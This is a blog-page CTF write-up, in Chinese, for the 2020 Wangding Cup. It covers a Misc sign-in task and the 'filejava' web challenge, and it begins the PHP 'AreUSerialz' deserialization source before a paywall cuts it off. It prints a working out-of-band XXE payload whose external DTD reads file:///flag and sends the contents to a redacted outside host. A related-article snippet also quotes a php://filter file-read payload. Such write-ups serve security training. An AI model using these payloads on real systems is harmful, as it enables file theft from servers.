2020网鼎杯wp

最新推荐文章于 2022-08-29 11:20:00 发布
最新推荐文章于 2022-08-29 11:20:00 发布
阅读量4.1k 收藏 11
点赞数 2
分类专栏: CTF 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40648358/article/details/106045483
版权
本文详细解析了2020网鼎杯比赛中的多个挑战,涉及信息安全、Web漏洞利用、加密算法解密和逆向工程等多个领域。在Misc部分,通过签到任务获取flag;在Web部分,利用XXE漏洞和反序列化技巧获取flag;Crypto部分,通过MD5求解和Python脚本计算flag;在Reverse Engineering部分,通过IDA分析和动态调试解密flag。
摘要由CSDN通过智能技术生成

2020网鼎杯wp_XJUSEC

MISC

签到

  • 点进去是选战队图标
  • 全部通过后会让输入token

qd1.png

  • 然后能在console看到flag

qd_flag.png

WEB

filejava

  • 打开题目,查看基本的功能后发现有一个文件下载功能,尝试穿越目录发现web.xml

  • 再次寻找这几个servlet的字节码在classes/cn/abc/servlet/xxx.class

2

  • 将class反编译之后发现具有xxe漏洞

Y8n48U.png

  • xlsx文件以压缩包方式打开,更改各个文件夹中的xml文件,然后再本地vps监听端口
<!DOCTYPE data SYSTEM "http://***.***.***.***/no_show_poc.dtd">
<data>&send;</data>

no_show_poc.dtd:
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://***.***.***.***:9999?p=%file;'>">
%all;
  • 最后如图

Y8uNM4.png

AreUSerialz

  • 打开题目后,直接给出了源码
<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {
   

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
   
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();   
    }

    public function process() {
   
        if($this->op == "1") {
   
            $this->write();       
        } else if($this->op == "2") {
   
            $res = $this->read();
            $this->output($res);
        } else {
   
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
   
        if(isset($this->filename) && isset($this->content)) {
   
            if(strlen((string)$this->content) > 100) {
   
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
   
            $this->output("Failed!");
        }
    }

    private function read() {
   
        $res = "";
        if(isset($this->filename)) {
   
            $res = file_get_contents(
最低0.47元/天 解锁文章
「已注销」
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022网鼎杯青龙组wp
fly1ng_pengu1n的博客
08-27 2936
2022网鼎杯青龙组wp
2020网鼎杯(青龙组)--WEB--AreUSerialz(反序列化)
a965527596的博客
05-17 2331
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
网鼎杯 未完成的书
天字第零号的博客
05-15 814
网鼎杯 未完成的书 比赛中这道题没有人做出来 这道题我只做出了钱两步,最后一步涉及加密,因此我无法攻克,希望有大佬看见了能帮助我完成 题目文件 13z8 我的文件 a1ko 下载文件后,发现只有一堆svg和一个README.txt README.txt内容 赠汝一物,曰拜斯六四之啥二五六,乃为 2348cd09e1624d34542806545906f2054a18036ce8a1cbe0ed5b0e4869bee5c2 赠汝一物,曰拜斯六四残片,乃为 *******y****2****fy****oR
BUUCTF刷题记录(6)
bmth666的博客
05-14 6759
文章目录web[FBCTF2019]RCEService web 打ctf(×) 被ctf打(√) [FBCTF2019]RCEService 首先查看文件夹文件,{"cmd":"ls"} 然后输入其他的发现被ban了,看wp得源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { ...
2020网鼎杯青龙组 部分wp
sanqin_的博客
05-18 602
2020网鼎杯青龙组部分题目解析
网鼎杯2020半决赛awdplus题目
12-07
"网鼎杯2020半决赛awdplus题目"是一个针对网络安全竞赛的专题,主要涉及的是Pwn(破解)和Web(网页安全)两类挑战。这类比赛通常旨在测试参赛者的逆向工程、代码审计、漏洞利用以及网络攻防技能。下面我们将详细...
2020 第二届网鼎杯 boom wp
01-20
2020 第二届网鼎杯 boom wp ​ ​ 卑微新手在线答题。。。。。 第二届网鼎杯-boom 下载附件得到一个boom.exe程序 打开是这样 根据提示继续 得到一串md5 加密的数据,使用在线解密 https://www.somd5.com/ 得到第...
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
2022第三届网鼎杯白虎组misc830原题附件
09-03
2022第三届网鼎杯白虎组misc830原题附件
2022第三届网鼎杯白虎组misc034附件
09-03
【标题】"2022第三届网鼎杯白虎组misc034附件"涉及到的是一个网络安全竞赛的相关挑战。网鼎杯是中国网络安全领域的一项重要赛事,旨在提升参赛者的网络安全技能和实战能力。"misc"通常在网络安全竞赛中代表“杂项”...
EIS2019-EzPOP
ro4lsc的博客
05-14 1403
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
2022第三届“网鼎杯”网络安全大赛-青龙组 部分WriteUp
渗透测试研究中心
08-29 6764
MISC 签到题 八道网络安全选择题,百度都能搜索到答案,这里如果只知道部分题目答案,可以通过枚举测试fuzz答案,获得flag flag: flag{a236b34b-8040-4ea5-9e1c-97169aa3f43a} RE re693 直接下载附件用golang打开 看main函数可以发现会打印两句话,要求输入有六个参数并且第三个为gLIhR的函数、被调用三次并且会调用到cHZv5......
2020第二届网鼎杯青龙组Reverse signal
YuSec
05-10 1291
signal Start 无壳,直接拖进IDA,F5 qmemcpy()内存复制,将unk_403040的内容复制到v4的地址下 跟进unk_403040看到一堆数据,整理后得到 [0Ah, 4,10h, 8, 3, 5, 1, 4,20h, 8, 5, 3, 1, 3, 2, 8,0Bh, 1,0Ch, 8, 4, 4, 1, 5, 3, 8, 3,21h , 1,0Bh, 8,0Bh, 1, 4, 9, 8, 3,20h, 1, 2,5
网鼎杯2020——Re
weixin_43781139的博客
05-11 1056
joker 当我看到这题的名叫joker的时候,我就知道,这题很美好,没好了。但是为了线下赛,我哭着下载了题目,然后,然后我就真哭了。 老规矩,拿到题目先查壳: 拿到有用信息,32位,无壳,gcc编译。 用ida看一下程序大体结构: 这里你会发现,按下f5会报错 这里是堆栈的问题,解决连接如下: https://blog.csdn.net/xiangshangbashaonian/article/details/81950110 反编译主函数: 发现整体思路很清晰吖,输入长度为24,接下来就是一堆
XJUSEC寒假赛个人WP
MZEPSan的博客
02-10 505
以下内容为本次XJUSEC寒假赛个人完成题目的WP WEB Include 打开题目后发现如下 通过学习了解到文件包含漏洞的有关知识,构造payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php 得到base64加密后的源码: PD9waHANCgkkZmxhZyA9ICdmbGFne2luY2x1ZDNf...
[网鼎杯 2020 青龙组]singal
weixin_43990313的博客
10-26 805
这个题目方法有很多,目的是练习算法的分析和vm练习,尝试了静态直接逆算法和动态静态结合的方法 方法1 拖入ida找到main函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+18h] [bp-1D4h]@1 __main(); qmemcpy(&v4, &unk_403040, 0x1C8u);//拷贝opcode表 vm_operad(&v4,
第二届网鼎杯(第一场:青龙组)web WriteUp
a3320315的博客
05-11 1871
学校战队总排名52,web和pwn各拿了一个一血,只能说师傅太强了,不过后来的排名有点起飞,最后半小时,直接从前十名飞出去了~~ filejava 这道题主要考察的是java的xxe漏洞,这个题目总共有两个功能,上传和下载功能,有上传和下载,我们就想到两个漏洞点,是否有任意文件上传或者任意文件下载? 经过测试确实有任意文件下载,但是任意文件上传确不存在,但是却能够为我们提供路径~~ 任意文件下载 但是我们不知道web的路径怎么办?我们还有文件上传的报错~~ 文件上传 我们可以看到报错处直接给了web的
re学习笔记(61)2020网鼎杯-青龙组-Re部分WP
逆向随笔
05-10 2756
新手一枚,如有错误(不足)请指正,谢谢!! bang 找个软件一键脱壳,jeb打开就是flag,, signal 虚拟机指令,看了一下貌似不能逆,,就直接用angr跑了 import angr p = angr.Project('/home/cx330/Desktop/Debugging/signal.exe') state = p.factory.entry_state() sm = p.factory.simulation_manager(state) def good(state): retu
羊城杯2020 wp
最新发布
08-18
羊城杯2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城杯聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值